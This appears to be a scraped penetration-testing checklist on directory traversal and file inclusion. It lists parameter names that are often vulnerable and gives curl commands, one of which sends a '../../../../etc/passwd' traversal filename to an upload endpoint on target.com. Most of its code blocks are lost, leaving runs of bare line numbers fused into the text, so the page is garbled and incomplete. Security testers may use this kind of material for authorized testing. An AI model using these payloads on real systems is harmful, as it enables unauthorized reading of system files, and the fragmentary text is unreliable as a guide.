Directory Traversal File Include
Check List
Methodology
Black Box
1
2
3
4
5
6
7
8
9
10
11
12
13
14
File Path & File Access Vulnerabilities
1
2
3
4
5
file=, document=, folder=, root=, path=, pg=, style=, pdf=, template=,
php_path=, doc=, page=, name=, cat=, dir=, action=, board=, date=, detail=,
download=, prefix=, include=, inc=, locate=, show=, site=, type=, view=,
content=, layout=, mod=, conf=, url=6
7
8
9
10
11
12
13
14
15
16
17
18
1
2
3
4
5
6
7
File Upload Path Traversal (Upload-Based Path Traversal)
1
2
3
curl -X POST -F "file=@test.txt" https://target.com/fileupload/4
5
6
7
curl -X POST -F "file=@../../../../../../../etc/passwd" https://target.com/fileupload/8
9
10
White Box
Cheat Sheet
Last updated